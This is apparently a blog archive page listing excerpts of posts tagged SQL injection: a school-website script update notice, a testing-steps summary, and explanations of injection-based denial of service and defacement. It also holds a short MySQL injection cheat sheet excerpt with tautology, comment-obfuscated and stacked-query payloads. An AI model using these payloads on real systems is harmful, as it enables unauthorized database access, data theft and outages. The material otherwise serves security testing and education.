News

SQL Injection

The latest update of the 2017 school website is now available

Saturday, 2 September 2017
To keep the website secure against hacker attacks, an updated version of the 2017 school website script is now available. It also fixes several bugs and adds a new feature, a file manager through which the administrator can upload files in .docx, .xlsx, .pptx, .zip, .pdf and other formats. Demo: http://sekolah.klatenweb.com Customers who have already purchased the 2017 school website script will be given the full script along with additional ...

How to Test for SQL Injection Bugs

Wednesday, 22 June 2011
Below is a summary of the steps needed to test for SQL injection bugs:
Step 1: Understand SQL injection attack scenarios
Step 2: List high-risk components and entry points
Step 3: Start testing and exploring
Step 4: Tune the test data

Step 4: Tune test case data
At this point you have started executing an exploratory pass through the input variables. During step 4 you need to concentrate on covering all entry points of each variab...

MySQL Injection Cheat Sheet

Tuesday, 21 June 2011
Basics.
SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES

SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()

SELECT host,user,db from mysql.db
SELECT...

SQL Injection for DoS

Sunday, 22 May 2011
Another application threat related to SQL injection is Denial of Service (DoS), which, in its most extreme form, can bring the Web application to a halt by shutting down its backend database. It takes place when an attacker appends the SHUTDOWN command to a SQL statement, or when the attacker creates complex queries over self-joins of large database tables with the intention of sending the database into time-consuming loops over lots of data. This ends up consuming pre...

SQL Injection for Web site defacement

Sunday, 22 May 2011
Web site defacement traditionally occurred when a hacker obtained administrative privileges to a Web site and then altered the content of the Web site with potentially offensive or erroneous graphics and text. While Web site owners have bolstered the security of Web configuration tools, malicious users have discovered a new technique to deface Web sites: SQL injection. In 2007, there were several high-profile incidents in which SQL injection was used for Web site defacement. ...